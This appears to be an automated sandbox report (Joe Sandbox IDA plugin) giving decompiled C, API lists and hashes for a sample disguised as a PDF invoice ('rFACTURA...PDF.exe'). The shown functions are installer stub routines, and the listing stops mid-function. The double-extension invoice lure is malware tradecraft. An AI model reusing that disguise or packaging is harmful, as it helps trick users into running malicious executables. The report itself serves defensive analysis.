                                                                                                  • Snapshot File: hcaresult_0_2_400000_rFACTURA_FAC_2023_1-1000733.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: MessageSend$Cursor$Item$Load$ButtonCheckColorlstrlen
                                                                                                  • String ID: Call$N
                                                                                                  • API String ID: 3103080414-3438112850
                                                                                                  • Opcode ID: 631cabfc39bdc86844b6c5ef759f4df1482c42644a70fa64dc4549b5ea516eb1
                                                                                                  • Instruction ID: 51cb052740ae368b0964ded38bc47e0fd82963d20e12a5d8f79ead0afd290bbe
                                                                                                  • Opcode Fuzzy Hash: 631cabfc39bdc86844b6c5ef759f4df1482c42644a70fa64dc4549b5ea516eb1
                                                                                                  • Instruction Fuzzy Hash: 636190B1900209BFDB10DF60DD45AAA7B69FB85344F00853AF705B61E0DB7DA951CF98
                                                                                                  Uniqueness

                                                                                                  Uniqueness Score: -1.00%

                                                                                                  C-Code - Quality: 90%
                                                                                                  			E00401000(struct HWND__* _a4, void* _a8, signed int _a12, void* _a16) {
                                                                                                  				struct tagLOGBRUSH _v16;
                                                                                                  				struct tagRECT _v32;
                                                                                                  				struct tagPAINTSTRUCT _v96;
                                                                                                  				struct HDC__* _t70;
                                                                                                  				struct HBRUSH__* _t87;
                                                                                                  				struct HFONT__* _t94;
                                                                                                  				long _t102;
                                                                                                  				signed int _t126;
                                                                                                  				struct HDC__* _t128;
                                                                                                  				intOrPtr _t130;
                                                                                                  
                                                                                                  				if(_a8 == 0xf) {
                                                                                                  					_t130 =  *0x7a8a34;
                                                                                                  					_t70 = BeginPaint(_a4,  &_v96);
                                                                                                  					_v16.lbStyle = _v16.lbStyle & 0x00000000;
                                                                                                  					_a8 = _t70;
                                                                                                  					GetClientRect(_a4,  &_v32);
                                                                                                  					_t126 = _v32.bottom;
                                                                                                  					_v32.bottom = _v32.bottom & 0x00000000;
                                                                                                  					while(_v32.top < _t126) {
                                                                                                  						_a12 = _t126 - _v32.top;
                                                                                                  						asm("cdq");
                                                                                                  						asm("cdq");
                                                                                                  						asm("cdq");
                                                                                                  						_v16.lbColor = 0 << 0x00000008 | (( *(_t130 + 0x50) & 0x000000ff) * _a12 + ( *(_t130 + 0x54) & 0x000000ff) * _v32.top) / _t126 & 0x000000ff;
                                                                                                  						_t87 = CreateBrushIndirect( &_v16);
                                                                                                  						_v32.bottom = _v32.bottom + 4;
                                                                                                  						_a16 = _t87;
                                                                                                  						FillRect(_a8,  &_v32, _t87);
                                                                                                  						DeleteObject(_a16);
                                                                                                  						_v32.top = _v32.top + 4;
                                                                                                  					}
                                                                                                  					if( *(_t130 + 0x58) != 0xffffffff) {
                                                                                                  						_t94 = CreateFontIndirectW( *(_t130 + 0x34));
                                                                                                  						_a16 = _t94;
                                                                                                  						if(_t94 != 0) {
                                                                                                  							_t128 = _a8;
                                                                                                  							_v32.left = 0x10;
                                                                                                  							_v32.top = 8;
                                                                                                  							SetBkMode(_t128, "true");
                                                                                                  							SetTextColor(_t128,  *(_t130 + 0x58));
                                                                                                  							_a8 = SelectObject(_t128, _a16);
                                                                                                  							DrawTextW(_t128, "Tophyperidrosis Setup", 0xffffffff,  &_v32, 0x820);
                                                                                                  							SelectObject(_t128, _a8);
                                                                                                  							DeleteObject(_a16);
                                                                                                  						}
                                                                                                  					}
                                                                                                  					EndPaint(_a4,  &_v96);
                                                                                                  					return 0;
                                                                                                  				}
                                                                                                  				_t102 = _a16;
                                                                                                  				if(_a8 == 0x46) {
                                                                                                  					 *(_t102 + 0x18) =  *(_t102 + 0x18) | 0x00000010;
                                                                                                  					 *((intOrPtr*)(_t102 + 4)) =  *0x7a8a28;
                                                                                                  				}
                                                                                                  				return DefWindowProcW(_a4, _a8, _a12, _t102);
                                                                                                  			}














                                                                                                  APIs
                                                                                                  • DefWindowProcW.USER32(?,00000046,?,?), ref: 0040102C
                                                                                                  • BeginPaint.USER32(?,?), ref: 00401047
                                                                                                  • GetClientRect.USER32(?,?), ref: 0040105B
                                                                                                  • CreateBrushIndirect.GDI32(00000000), ref: 004010CF
                                                                                                  • FillRect.USER32(00000000,?,00000000), ref: 004010E4
                                                                                                  • DeleteObject.GDI32(?), ref: 004010ED
                                                                                                  • CreateFontIndirectW.GDI32(?), ref: 00401105
                                                                                                  • SetBkMode.GDI32(00000000,?), ref: 00401126
                                                                                                  • SetTextColor.GDI32(00000000,000000FF), ref: 00401130
                                                                                                  • SelectObject.GDI32(00000000,?), ref: 00401140
                                                                                                  • DrawTextW.USER32(00000000,Tophyperidrosis Setup,000000FF,00000010,00000820), ref: 00401156
                                                                                                  • SelectObject.GDI32(00000000,00000000), ref: 00401160
                                                                                                  • DeleteObject.GDI32(?), ref: 00401165
                                                                                                  • EndPaint.USER32(?,?), ref: 0040116E
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000000.00000002.1411782168.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_0_2_400000_rFACTURA_FAC_2023_1-1000733.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: Object$CreateDeleteIndirectPaintRectSelectText$BeginBrushClientColorDrawFillFontModeProcWindow
                                                                                                  • String ID: F$Tophyperidrosis Setup
                                                                                                  • API String ID: 941294808-1119424813
                                                                                                  • Opcode ID: 218f2c87b148b58c94c6785b51cf5afc075c1faf60bc5df3e6f759b2377d660f
                                                                                                  • Instruction ID: 0958fbfe94b1809001ec2c76305b3cf500f7264b01c73c256976ee1787a3906e
                                                                                                  • Opcode Fuzzy Hash: 218f2c87b148b58c94c6785b51cf5afc075c1faf60bc5df3e6f759b2377d660f
                                                                                                  • Instruction Fuzzy Hash: B1418C71800209AFCF058F95DE459AF7BB9FF45310F00842AF591AA1A0CB38D954DFA4
                                                                                                  Uniqueness

                                                                                                  Uniqueness Score: -1.00%

                                                                                                  C-Code - Quality: 100%
                                                                                                  			E00405EAB(void* __ecx) {
                                                                                                  				void* __ebx;
                                                                                                  				void* __edi;
                                                                                                  				void* __esi;
                                                                                                  				long _t12;
                                                                                                  				long _t24;
                                                                                                  				char* _t31;
                                                                                                  				int _t37;
                                                                                                  				void* _t38;
                                                                                                  				intOrPtr* _t39;
                                                                                                  				long _t42;
                                                                                                  				WCHAR* _t44;
                                                                                                  				void* _t46;
                                                                                                  				void* _t48;
                                                                                                  				void* _t49;
                                                                                                  				void* _t52;
                                                                                                  				void* _t53;
                                                                                                  
                                                                                                  				_t38 = __ecx;
                                                                                                  				_t44 =  *(_t52 + 0x14);
                                                                                                  				 *0x7a55c0 = 0x55004e;
                                                                                                  				 *0x7a55c4 = 0x4c;
                                                                                                  				if(_t44 == 0) {
                                                                                                  					L3:
                                                                                                  					_t12 = GetShortPathNameW( *(_t52 + 0x1c), 0x7a5dc0, 0x400);
                                                                                                  					if(_t12 != 0 && _t12 <= 0x400) {
                                                                                                  						_t37 = wsprintfA(0x7a51c0, "%ls=%ls\r\n", 0x7a55c0, 0x7a5dc0);
                                                                                                  						_t53 = _t52 + 0x10;
                                                                                                  						E00406281(_t37, 0x400, 0x7a5dc0, 0x7a5dc0,  *((intOrPtr*)( *0x7a8a34 + 0x128)));
                                                                                                  						_t12 = E00405D51(0x7a5dc0, 0xc0000000, "true");
                                                                                                  						_t48 = _t12;
                                                                                                  						 *(_t53 + 0x18) = _t48;
                                                                                                  						if(_t48 != 0xffffffff) {
                                                                                                  							_t42 = GetFileSize(_t48, 0);
                                                                                                  							_t6 = _t37 + 0xa; // 0xa
                                                                                                  							_t46 = GlobalAlloc(0x40, _t42 + _t6);
                                                                                                  							if(_t46 == 0 || E00405DD4(_t48, _t46, _t42) == 0) {
                                                                                                  								L18:
                                                                                                  								return CloseHandle(_t48);
                                                                                                  							} else {
                                                                                                  								if(E00405CB6(_t38, _t46, "[Rename]\r\n") != 0) {
                                                                                                  									_t49 = E00405CB6(_t38, _t21 + 0xa, "\n[");
                                                                                                  									if(_t49 == 0) {
                                                                                                  										_t48 =  *(_t53 + 0x18);
                                                                                                  										L16:
                                                                                                  										_t24 = _t42;
                                                                                                  										L17:
                                                                                                  										E00405D0C(_t24 + _t46, 0x7a51c0, _t37);
                                                                                                  										SetFilePointer(_t48, 0, 0, 0);
                                                                                                  										E00405E03(_t48, _t46, _t42 + _t37);
                                                                                                  										GlobalFree(_t46);
                                                                                                  										goto L18;
                                                                                                  									}
                                                                                                  									_t39 = _t46 + _t42;
                                                                                                  									_t31 = _t39 + _t37;
                                                                                                  									while(_t39 > _t49) {
                                                                                                  										 *_t31 =  *_t39;
                                                                                                  										_t31 = _t31 - 1;
                                                                                                  										_t39 = _t39 - 1;
                                                                                                  									}
                                                                                                  									_t24 = _t49 - _t46 + 1;
                                                                                                  									_t48 =  *(_t53 + 0x18);
                                                                                                  									goto L17;
                                                                                                  								}
                                                                                                  								lstrcpyA(_t46 + _t42, "[Rename]\r\n");
                                                                                                  								_t42 = _t42 + 0xa;
                                                                                                  								goto L16;
                                                                                                  							}
                                                                                                  						}
                                                                                                  					}
                                                                                                  				} else {
                                                                                                  					CloseHandle(E00405D51(_t44, 0, "true"));
                                                                                                  					_t12 = GetShortPathNameW(_t44, 0x7a55c0, 0x400);
                                                                                                  					if(_t12 != 0 && _t12 <= 0x400) {
                                                                                                  						goto L3;
                                                                                                  					}
                                                                                                  				}
                                                                                                  				return _t12;
                                                                                                  			}




















                                                                                                  APIs
                                                                                                  • CloseHandle.KERNEL32(00000000,?,00000000,?,?,00000000,?,?,00406046,?,?), ref: 00405EE6
                                                                                                  • GetShortPathNameW.KERNEL32(?,007A55C0,00000400), ref: 00405EEF
                                                                                                    • Part of subcall function 00405CB6: lstrlenA.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,00405F9F,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405CC6
                                                                                                    • Part of subcall function 00405CB6: lstrlenA.KERNEL32(00000000,?,00000000,00405F9F,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405CF8
                                                                                                  • GetShortPathNameW.KERNEL32(?,007A5DC0,00000400), ref: 00405F0C
                                                                                                  • wsprintfA.USER32 ref: 00405F2A
                                                                                                  • GetFileSize.KERNEL32(00000000,00000000,007A5DC0,C0000000,?,007A5DC0,?,?,?,?,?), ref: 00405F65
                                                                                                  • GlobalAlloc.KERNEL32(00000040,0000000A,?,?,?,?), ref: 00405F74
                                                                                                  • lstrcpyA.KERNEL32(00000000,[Rename],00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405FAC
                                                                                                  • SetFilePointer.KERNEL32(0040A560,00000000,00000000,00000000,00000000,007A51C0,00000000,-0000000A,0040A560,00000000,[Rename],00000000,00000000,00000000), ref: 00406002
                                                                                                  • GlobalFree.KERNEL32(00000000), ref: 00406013
                                                                                                  • CloseHandle.KERNEL32(00000000,?,?,?,?), ref: 0040601A
                                                                                                    • Part of subcall function 00405D51: GetFileAttributesW.KERNELBASE(?,00402F01,C:\Users\user\Desktop\rFACTURA_FAC_2023_1-1000733.PDF.exe,80000000,00000003,?,00000006,00000008,0000000A), ref: 00405D55
                                                                                                    • Part of subcall function 00405D51: CreateFileW.KERNELBASE(?,?,?,00000000,?,00000001,00000000,?,00000006,00000008,0000000A), ref: 00405D77
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000000.00000002.1411782168.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_0_2_400000_rFACTURA_FAC_2023_1-1000733.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: File$CloseGlobalHandleNamePathShortlstrlen$AllocAttributesCreateFreePointerSizelstrcpywsprintf
                                                                                                  • String ID: %ls=%ls$[Rename]
                                                                                                  • API String ID: 2171350718-461813615
                                                                                                  • Opcode ID: 1f2b66d66530b4cdd3a0434c0d3521a5c22e25164d410e4764023a67e6413042
                                                                                                  • Instruction ID: 89c32d2153287748ec41ed641a28e9b16702ce233dbd70bd77460b6709aa78c6
                                                                                                  • Opcode Fuzzy Hash: 1f2b66d66530b4cdd3a0434c0d3521a5c22e25164d410e4764023a67e6413042
                                                                                                  • Instruction Fuzzy Hash: F8312871601B05BBD220AB619D48F6B3A9CEF85744F14003EFA42F62D2DA7CD8118ABD
                                                                                                  Uniqueness

                                                                                                  Uniqueness Score: -1.00%

                                                                                                  C-Code - Quality: 91%
                                                                                                  			E004064F3(WCHAR* _a4) {
                                                                                                  				short _t5;
                                                                                                  				short _t7;
                                                                                                  				WCHAR* _t19;
                                                                                                  				WCHAR* _t20;
                                                                                                  				WCHAR* _t21;
                                                                                                  
                                                                                                  				_t20 = _a4;
                                                                                                  				if( *_t20 == 0x5c && _t20[1] == 0x5c && _t20[2] == 0x3f && _t20[3] == 0x5c) {
                                                                                                  					_t20 =  &(_t20[4]);
                                                                                                  				}
                                                                                                  				if( *_t20 != 0 && E00405BA7(_t20) != 0) {
                                                                                                  					_t20 =  &(_t20[2]);
                                                                                                  				}
                                                                                                  				_t5 =  *_t20;
                                                                                                  				_t21 = _t20;
                                                                                                  				_t19 = _t20;
                                                                                                  				if(_t5 != 0) {
                                                                                                  					do {
                                                                                                  						if(_t5 > 0x1f &&  *((short*)(E00405B5D(L"*?|<>/\":", _t5))) == 0) {
                                                                                                  							E00405D0C(_t19, _t20, CharNextW(_t20) - _t20 >> 1);
                                                                                                  							_t19 = CharNextW(_t19);
                                                                                                  						}
                                                                                                  						_t20 = CharNextW(_t20);
                                                                                                  						_t5 =  *_t20;
                                                                                                  					} while (_t5 != 0);
                                                                                                  				}
                                                                                                  				 *_t19 =  *_t19 & 0x00000000;
                                                                                                  				while(1) {
                                                                                                  					_push(_t19);
                                                                                                  					_push(_t21);
                                                                                                  					_t19 = CharPrevW();
                                                                                                  					_t7 =  *_t19;
                                                                                                  					if(_t7 != 0x20 && _t7 != 0x5c) {
                                                                                                  						break;
                                                                                                  					}
                                                                                                  					 *_t19 =  *_t19 & 0x00000000;
                                                                                                  					if(_t21 < _t19) {
                                                                                                  						continue;
                                                                                                  					}
                                                                                                  					break;
                                                                                                  				}
                                                                                                  				return _t7;
                                                                                                  			}









                                                                                                  APIs
                                                                                                  • CharNextW.USER32(?,*?|<>/":,00000000,00000000,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,"C:\Users\user\Desktop\rFACTURA_FAC_2023_1-1000733.PDF.exe",0040332B,C:\Users\user\AppData\Local\Temp\,76F93420,0040359C,?,00000006,00000008,0000000A), ref: 00406556
                                                                                                  • CharNextW.USER32(?,?,?,00000000,?,00000006,00000008,0000000A), ref: 00406565
                                                                                                  • CharNextW.USER32(?,00000000,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,"C:\Users\user\Desktop\rFACTURA_FAC_2023_1-1000733.PDF.exe",0040332B,C:\Users\user\AppData\Local\Temp\,76F93420,0040359C,?,00000006,00000008,0000000A), ref: 0040656A
                                                                                                  • CharPrevW.USER32(?,?,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,"C:\Users\user\Desktop\rFACTURA_FAC_2023_1-1000733.PDF.exe",0040332B,C:\Users\user\AppData\Local\Temp\,76F93420,0040359C,?,00000006,00000008,0000000A), ref: 0040657D
                                                                                                  Strings
                                                                                                  • "C:\Users\user\Desktop\rFACTURA_FAC_2023_1-1000733.PDF.exe", xrefs: 004064F3
                                                                                                  • *?|<>/":, xrefs: 00406545
                                                                                                  • C:\Users\user\AppData\Local\Temp\, xrefs: 004064F4, 004064F9
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000000.00000002.1411782168.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_0_2_400000_rFACTURA_FAC_2023_1-1000733.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: Char$Next$Prev
                                                                                                  • String ID: "C:\Users\user\Desktop\rFACTURA_FAC_2023_1-1000733.PDF.exe"$*?|<>/":$C:\Users\user\AppData\Local\Temp\
                                                                                                  • API String ID: 589700163-1355870568
                                                                                                  • Opcode ID: dac06de1e1615827748cce9690c43cbd9586789469f0d882438918906e4257c7
                                                                                                  • Instruction ID: b8c3cbf5b75eb2b2499c9cde9ef872d51aef5c2750dc7b0313243111e00abff4
                                                                                                  • Opcode Fuzzy Hash: dac06de1e1615827748cce9690c43cbd9586789469f0d882438918906e4257c7
                                                                                                  • Instruction Fuzzy Hash: 9B11C85580021275DB303B14BC40ABBA6F8EF59754F52403FE985732C8E77C5C9286BD
                                                                                                  Uniqueness

                                                                                                  Uniqueness Score: -1.00%

                                                                                                  C-Code - Quality: 100%
                                                                                                  			E0040425B(intOrPtr _a4, struct HDC__* _a8, struct HWND__* _a12) {
                                                                                                  				struct tagLOGBRUSH _v16;
                                                                                                  				long _t35;
                                                                                                  				long _t37;
                                                                                                  				void* _t40;
                                                                                                  				long* _t49;
                                                                                                  
                                                                                                  				if(_a4 + 0xfffffecd > 5) {
                                                                                                  					L15:
                                                                                                  					return 0;
                                                                                                  				}
                                                                                                  				_t49 = GetWindowLongW(_a12, 0xffffffeb);
                                                                                                  				if(_t49 == 0) {
                                                                                                  					goto L15;
                                                                                                  				}
                                                                                                  				_t35 =  *_t49;
                                                                                                  				if((_t49[5] & 0x00000002) != 0) {
                                                                                                  					_t35 = GetSysColor(_t35);
                                                                                                  				}
                                                                                                  				if((_t49[5] & 0x00000001) != 0) {
                                                                                                  					SetTextColor(_a8, _t35);
                                                                                                  				}
                                                                                                  				SetBkMode(_a8, _t49[4]);
                                                                                                  				_t37 = _t49[1];
                                                                                                  				_v16.lbColor = _t37;
                                                                                                  				if((_t49[5] & 0x00000008) != 0) {
                                                                                                  					_t37 = GetSysColor(_t37);
                                                                                                  					_v16.lbColor = _t37;
                                                                                                  				}
                                                                                                  				if((_t49[5] & 0x00000004) != 0) {
                                                                                                  					SetBkColor(_a8, _t37);
                                                                                                  				}
                                                                                                  				if((_t49[5] & 0x00000010) != 0) {
                                                                                                  					_v16.lbStyle = _t49[2];
                                                                                                  					_t40 = _t49[3];
                                                                                                  					if(_t40 != 0) {
                                                                                                  						DeleteObject(_t40);
                                                                                                  					}
                                                                                                  					_t49[3] = CreateBrushIndirect( &_v16);
                                                                                                  				}
                                                                                                  				return _t49[3];
                                                                                                  			}









                                                                                                  APIs
                                                                                                  • GetWindowLongW.USER32(?,000000EB), ref: 00404278
                                                                                                  • GetSysColor.USER32(00000000), ref: 00404294
                                                                                                  • SetTextColor.GDI32(?,00000000), ref: 004042A0
                                                                                                  • SetBkMode.GDI32(?,?), ref: 004042AC
                                                                                                  • GetSysColor.USER32(?), ref: 004042BF
                                                                                                  • SetBkColor.GDI32(?,?), ref: 004042CF
                                                                                                  • DeleteObject.GDI32(?), ref: 004042E9
                                                                                                  • CreateBrushIndirect.GDI32(?), ref: 004042F3
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000000.00000002.1411782168.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_0_2_400000_rFACTURA_FAC_2023_1-1000733.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: Color$BrushCreateDeleteIndirectLongModeObjectTextWindow
                                                                                                  • String ID:
                                                                                                  • API String ID: 2320649405-0
                                                                                                  • Opcode ID: d93bb5df8f2b76ccefaad0a5d1bb7d3eec77da1dbbaa67d130298efb7d8eee66
                                                                                                  • Instruction ID: 89996262c0d64ac0fda19422125f93b67266a0f1ca122a9c1e6306c3a20023a3
                                                                                                  • Opcode Fuzzy Hash: d93bb5df8f2b76ccefaad0a5d1bb7d3eec77da1dbbaa67d130298efb7d8eee66
                                                                                                  • Instruction Fuzzy Hash: 34219271500704ABCB209F68DE08B4BBBF8AF41714B048A6DFD92A22A0C734D904CB54
                                                                                                  Uniqueness

                                                                                                  Uniqueness Score: -1.00%

                                                                                                  C-Code - Quality: 100%
                                                                                                  			E00404B8D(struct HWND__* _a4, intOrPtr _a8) {
                                                                                                  				long _v8;
                                                                                                  				signed char _v12;
                                                                                                  				unsigned int _v16;
                                                                                                  				void* _v20;
                                                                                                  				intOrPtr _v24;
                                                                                                  				long _v56;
                                                                                                  				void* _v60;
                                                                                                  				long _t15;
                                                                                                  				unsigned int _t19;
                                                                                                  				signed int _t25;
                                                                                                  				struct HWND__* _t28;
                                                                                                  
                                                                                                  				_t28 = _a4;
                                                                                                  				_t15 = SendMessageW(_t28, 0x110a, 9, 0);
                                                                                                  				if(_a8 == 0) {
                                                                                                  					L4:
                                                                                                  					_v56 = _t15;
                                                                                                  					_v60 = 4;
                                                                                                  					SendMessageW(_t28, 0x113e, 0,  &_v60);
                                                                                                  					return _v24;
                                                                                                  				}
                                                                                                  				_t19 = GetMessagePos();
                                                                                                  				_v16 = _t19 >> 0x10;
                                                                                                  				_v20 = _t19;
                                                                                                  				ScreenToClient(_t28,  &_v20);
                                                                                                  				_t25 = SendMessageW(_t28, 0x1111, 0,  &_v20);
                                                                                                  				if((_v12 & 0x00000066) != 0) {
                                                                                                  					_t15 = _v8;
                                                                                                  					goto L4;
                                                                                                  				}
                                                                                                  				return _t25 | 0xffffffff;
                                                                                                  			}















                                                                                                  APIs
                                                                                                  • SendMessageW.USER32(?,0000110A,00000009,00000000), ref: 00404BA8
                                                                                                  • GetMessagePos.USER32 ref: 00404BB0
                                                                                                  • ScreenToClient.USER32(?,?), ref: 00404BCA
                                                                                                  • SendMessageW.USER32(?,00001111,00000000,?), ref: 00404BDC
                                                                                                  • SendMessageW.USER32(?,0000113E,00000000,?), ref: 00404C02
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000000.00000002.1411782168.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_0_2_400000_rFACTURA_FAC_2023_1-1000733.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: Message$Send$ClientScreen
                                                                                                  • String ID: f
                                                                                                  • API String ID: 41195575-1993550816
                                                                                                  • Opcode ID: e2d2d6aa42d138b4bf43a857dc2fb8cfa63f2fbdf5f441295addbf44c9bf4daa
                                                                                                  • Instruction ID: 1a768e81d1a3c698b7e3ef6d626f5858b2063c99cedd32227338619671f62d57
                                                                                                  • Opcode Fuzzy Hash: e2d2d6aa42d138b4bf43a857dc2fb8cfa63f2fbdf5f441295addbf44c9bf4daa
                                                                                                  • Instruction Fuzzy Hash: 18015E7190021CBADB00DB95DD85FFEBBBCAF95715F10412BBA50BA1D0C7B4AA058BA4
                                                                                                  Uniqueness

                                                                                                  Uniqueness Score: -1.00%

                                                                                                  C-Code - Quality: 73%
                                                                                                  			E00401DB3(intOrPtr __edx) {
                                                                                                  				void* __esi;
                                                                                                  				int _t9;
                                                                                                  				signed char _t15;
                                                                                                  				struct HFONT__* _t18;
                                                                                                  				intOrPtr _t30;
                                                                                                  				struct HDC__* _t31;
                                                                                                  				void* _t33;
                                                                                                  				void* _t35;
                                                                                                  
                                                                                                  				_t30 = __edx;
                                                                                                  				_t31 = GetDC( *(_t35 - 8));
                                                                                                  				_t9 = E00402C15(2);
                                                                                                  				 *((intOrPtr*)(_t35 - 0x4c)) = _t30;
                                                                                                  				0x40cdb0->lfHeight =  ~(MulDiv(_t9, GetDeviceCaps(_t31, 0x5a), 0x48));
                                                                                                  				ReleaseDC( *(_t35 - 8), _t31);
                                                                                                  				 *0x40cdc0 = E00402C15(3);
                                                                                                  				_t15 =  *((intOrPtr*)(_t35 - 0x18));
                                                                                                  				 *((intOrPtr*)(_t35 - 0x4c)) = _t30;
                                                                                                  				 *0x40cdc7 = 1;
                                                                                                  				 *0x40cdc4 = _t15 & 0x00000001;
                                                                                                  				 *0x40cdc5 = _t15 & 0x00000002;
                                                                                                  				 *0x40cdc6 = _t15 & 0x00000004;
                                                                                                  				E00406281(_t9, _t31, _t33, "Times New Roman",  *((intOrPtr*)(_t35 - 0x24)));
                                                                                                  				_t18 = CreateFontIndirectW(0x40cdb0);
                                                                                                  				_push(_t18);
                                                                                                  				_push(_t33);
                                                                                                  				E004061A6();
                                                                                                  				 *0x7a8ac8 =  *0x7a8ac8 +  *((intOrPtr*)(_t35 - 4));
                                                                                                  				return 0;
                                                                                                  			}












                                                                                                  APIs
                                                                                                  • GetDC.USER32(?), ref: 00401DB6
                                                                                                  • GetDeviceCaps.GDI32(00000000,0000005A), ref: 00401DD0
                                                                                                  • MulDiv.KERNEL32(00000000,00000000), ref: 00401DD8
                                                                                                  • ReleaseDC.USER32(?,00000000), ref: 00401DE9
                                                                                                  • CreateFontIndirectW.GDI32(0040CDB0), ref: 00401E38
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000000.00000002.1411782168.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_0_2_400000_rFACTURA_FAC_2023_1-1000733.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: CapsCreateDeviceFontIndirectRelease
                                                                                                  • String ID: Times New Roman
                                                                                                  • API String ID: 3808545654-927190056
                                                                                                  • Opcode ID: 08381414c6e739f680c1a14db26c866ed95d6f562d15ae060e4ba8fd4e20cd39
                                                                                                  • Instruction ID: 4d28dda0b40ea0953a32cffe00044d8590db675546aa8caf17c1304664b83f42
                                                                                                  • Opcode Fuzzy Hash: 08381414c6e739f680c1a14db26c866ed95d6f562d15ae060e4ba8fd4e20cd39
                                                                                                  • Instruction Fuzzy Hash: 78017572954241EFE7006BB0AF8AB9A7FB4AF55301F10497EF241B71E2CA7800458F2D
                                                                                                  Uniqueness

                                                                                                  Uniqueness Score: -1.00%

                                                                                                  C-Code - Quality: 100%
                                                                                                  			E00402DD7(struct HWND__* _a4, intOrPtr _a8) {
                                                                                                  				short _v132;
                                                                                                  				int _t11;
                                                                                                  				int _t20;
                                                                                                  
                                                                                                  				if(_a8 == 0x110) {
                                                                                                  					SetTimer(_a4, "true", 0xfa, 0);
                                                                                                  					_a8 = 0x113;
                                                                                                  				}
                                                                                                  				if(_a8 == 0x113) {
                                                                                                  					_t20 =  *0x78b6d4; // 0x674f5
                                                                                                  					_t11 =  *0x7976dc; // 0x69700
                                                                                                  					if(_t20 >= _t11) {
                                                                                                  						_t20 = _t11;
                                                                                                  					}
                                                                                                  					wsprintfW( &_v132, L"verifying installer: %d%%", MulDiv(_t20, 0x64, _t11));
                                                                                                  					SetWindowTextW(_a4,  &_v132);
                                                                                                  					SetDlgItemTextW(_a4, 0x406,  &_v132);
                                                                                                  				}
                                                                                                  				return 0;
                                                                                                  			}







                                                                                                  APIs
                                                                                                  • SetTimer.USER32(?,?,000000FA,00000000), ref: 00402DF5
                                                                                                  • MulDiv.KERNEL32(000674F5,00000064,00069700), ref: 00402E20
                                                                                                  • wsprintfW.USER32 ref: 00402E30
                                                                                                  • SetWindowTextW.USER32(?,?), ref: 00402E40
                                                                                                  • SetDlgItemTextW.USER32(?,00000406,?), ref: 00402E52
                                                                                                  Strings
                                                                                                  • verifying installer: %d%%, xrefs: 00402E2A
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000000.00000002.1411782168.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_0_2_400000_rFACTURA_FAC_2023_1-1000733.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: Text$ItemTimerWindowwsprintf
                                                                                                  • String ID: verifying installer: %d%%
                                                                                                  • API String ID: 1451636040-82062127
                                                                                                  • Opcode ID: 3278fe65966c90afb4b572b20ee93d6781e748b995f18389883d07859a761d52
                                                                                                  • Instruction ID: c563a075df83d92fb310a5016e42997ab7e5782e6b78b1479044c0af3efb3f55
                                                                                                  • Opcode Fuzzy Hash: 3278fe65966c90afb4b572b20ee93d6781e748b995f18389883d07859a761d52
                                                                                                  • Instruction Fuzzy Hash: DE01677064020CBFDF149F50DD49FAA3B68AB00304F108039FA06F51D0DBB98965CF59
                                                                                                  Uniqueness

                                                                                                  Uniqueness Score: -1.00%

                                                                                                  C-Code - Quality: 76%
                                                                                                  			E100024A4(intOrPtr* _a4) {
                                                                                                  				intOrPtr _v4;
                                                                                                  				intOrPtr* _t24;
                                                                                                  				void* _t26;
                                                                                                  				intOrPtr _t27;
                                                                                                  				signed int _t35;
                                                                                                  				void* _t39;
                                                                                                  				intOrPtr _t40;
                                                                                                  				void* _t43;
                                                                                                  
                                                                                                  				_t39 = E1000121B();
                                                                                                  				_t24 = _a4;
                                                                                                  				_t40 =  *((intOrPtr*)(_t24 + 0x1014));
                                                                                                  				_v4 = _t40;
                                                                                                  				_t43 = (_t40 + 0x81 << 5) + _t24;
                                                                                                  				do {
                                                                                                  					if( *((intOrPtr*)(_t43 - 4)) != 0xffffffff) {
                                                                                                  					}
                                                                                                  					_t35 =  *(_t43 - 8);
                                                                                                  					if(_t35 <= 7) {
                                                                                                  						switch( *((intOrPtr*)(_t35 * 4 +  &M100025B4))) {
                                                                                                  							case 0:
                                                                                                  								 *_t39 =  *_t39 & 0x00000000;
                                                                                                  								goto L15;
                                                                                                  							case 1:
                                                                                                  								_push( *__eax);
                                                                                                  								goto L13;
                                                                                                  							case 2:
